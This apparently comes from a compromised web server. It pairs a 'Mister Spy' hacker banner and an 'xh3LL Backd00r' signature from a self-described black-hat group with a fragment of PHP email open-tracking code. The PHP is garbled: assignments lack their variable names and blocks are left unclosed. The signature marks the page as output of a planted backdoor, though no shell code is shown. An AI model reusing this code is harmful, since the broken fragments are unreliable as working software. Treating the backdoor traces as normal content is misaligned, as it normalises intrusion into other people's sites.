Mister Spy Say ="Hello Kids ... :D"
___ ____ _ _____
| \/ (_) | | / ___|
| . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _
| |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | |
| | | | \__ \ || __/ | /\__/ / |_) | |_| |
\_| |_/_|___/\__\___|_| \____/| .__/ \__, |
| | __/ |
|_| |___/
Bot Mister Spy V3
Mister Spy
Mister Spy
$er = error_reporting(0);
require_once dirname(__FILE__) .'/admin/commonlib/lib/unregister_globals.php';
require_once dirname(__FILE__) .'/admin/commonlib/lib/magic_quotes.php';
## none of our parameters can contain html for now
$_GET = removeXss($_GET);
$_POST = removeXss($_POST);
$_REQUEST = removeXss($_REQUEST);
$_COOKIE = removeXss($_COOKIE);
if (isset($_SERVER["ConfigFile"]) && is_file($_SERVER["ConfigFile"])) {
include $_SERVER["ConfigFile"];
} elseif (is_file("config/config.php")) {
include 'config/config.php';
} else {
print "Error, cannot find config file\n";
require_once dirname(__FILE__).'/admin/init.php';
$GLOBALS["database_module"] = basename($GLOBALS["database_module"]);
$GLOBALS["language_module"] = basename($GLOBALS["language_module"]);
require_once dirname(__FILE__).'/admin/'.$GLOBALS["database_module"];
# load default english and language
include_once dirname(__FILE__)."/texts/english.inc";
# Allow customisation per installation
if (is_file($_SERVER['DOCUMENT_ROOT'].'/'.$GLOBALS["language_module"])) {
include_once $_SERVER['DOCUMENT_ROOT'].'/'.$GLOBALS["language_module"];
include_once dirname(__FILE__)."/admin/languages.php";
require_once dirname(__FILE__)."/admin/defaultconfig.php";
require_once dirname(__FILE__).'/admin/connect.php';
include_once dirname(__FILE__)."/admin/lib.php";
if (!empty($_GET["u"]) && !empty($_GET["m"])) {
$_GET['u'] = preg_replace('/\W/','',$_GET['u']);
$query = sprintf('select id from %s where uniqid = ?', $GLOBALS['tables']['user']);
$rs = Sql_Query_Params($query, array($_GET['u']));
$useridrow = Sql_Fetch_Row($rs);
$userid = $useridrow[0];
$messageid = sprintf('%d',$_GET['m']);
} elseif (!empty($_GET['x'])) {
## new method, that also tracks forward-opens, not active yet.
$track = base64_decode($_GET['x']);
$track = $track ^ XORmask;
@list($userhash,$messageid,$userid) = explode('|',$track);
if ($userid) {
= ' update %s set viewed = current_timestamp'
. ' where messageid = ? and userid = ? and status = "sent"';
$query = sprintf($query, $GLOBALS['tables']['usermessage']);
Sql_Query_Params($query, array($messageid,$userid ));
if (Sql_Affected_Rows()) {
= ' update %s set viewed = viewed + 1'
. ' where id = ?';
$query = sprintf($query, $GLOBALS['tables']['message']);
Sql_Query_Params($query, array($messageid));
header("Content-Type: image/png");
Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat